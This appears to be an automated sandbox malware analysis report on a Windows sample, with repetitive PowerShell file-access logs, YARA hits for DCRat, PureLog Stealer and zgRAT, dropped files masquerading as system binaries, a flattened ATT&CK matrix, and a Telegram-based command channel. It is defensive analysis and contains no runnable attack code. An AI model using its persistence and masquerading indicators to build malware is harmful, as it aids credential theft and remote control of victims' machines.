                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeQueries volume information: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe VolumeInformation
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe VolumeInformation
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Recovery\ctfmon.exe VolumeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2376236746.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: LzmJLVB41K.exe PID: 2016, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fozAQGvSmfTQIywuzSgk.exe PID: 7884, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: LzmJLVB41K.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.LzmJLVB41K.exe.9e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: LzmJLVB41K.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.LzmJLVB41K.exe.9e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2376236746.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: LzmJLVB41K.exe PID: 2016, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fozAQGvSmfTQIywuzSgk.exe PID: 7884, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: LzmJLVB41K.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.LzmJLVB41K.exe.9e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: LzmJLVB41K.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.LzmJLVB41K.exe.9e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts11
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		OS Credential Dumping2
                            File and Directory Discovery                            		1
                            Taint Shared Content                            		11
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory14
                            System Information Discovery                            		Remote Desktop ProtocolData from Removable Media1
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		2
                            Obfuscated Files or Information                            		Security Account Manager11
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive11
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron31
                            Registry Run Keys / Startup Folder                            		31
                            Registry Run Keys / Startup Folder                            		12
                            Software Packing                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets31
                            Virtualization/Sandbox Evasion                            		SSHKeylogging4
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            File Deletion                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                            Masquerading                            		DCSync1
                            Remote System Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                            Virtualization/Sandbox Evasion                            		Proc Filesystem11
                            System Network Configuration Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                            Process Injection                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557447 Sample: LzmJLVB41K.exe Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 59 api.telegram.org 2->59 61 ipinfo.io 2->61 67 Suricata IDS alerts for network traffic 2->67 69 Antivirus detection for dropped file 2->69 71 Antivirus / Scanner detection for submitted sample 2->71 75 13 other signatures 2->75 8 LzmJLVB41K.exe 24 40 2->8         started        13 ctfmon.exe 3 2->13         started        15 fozAQGvSmfTQIywuzSgk.exe 3 2->15         started        17 8 other processes 2->17 signatures3 73 Uses the Telegram API (likely for C&C communication) 59->73 process4 dnsIp5 63 api.telegram.org 149.154.167.220, 443, 49739, 49993 TELEGRAMRU United Kingdom 8->63 65 ipinfo.io 34.117.59.81, 443, 49726, 49733 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->65 51 C:\Windows\Vss\...\fozAQGvSmfTQIywuzSgk.exe, PE32 8->51 dropped 53 C:\Users\user\Desktop\zxBbjKdN.log, PE32 8->53 dropped 55 C:\Users\user\Desktop\yRglcgIV.log, PE32 8->55 dropped 57 14 other malicious files 8->57 dropped 85 Creates an undocumented autostart registry key 8->85 87 Creates multiple autostart registry keys 8->87 89 Creates an autostart registry key pointing to binary in C:\Windows 8->89 97 3 other signatures 8->97 19 cmd.exe 8->19         started        22 csc.exe 4 8->22         started        25 csc.exe 4 8->25         started        27 7 other 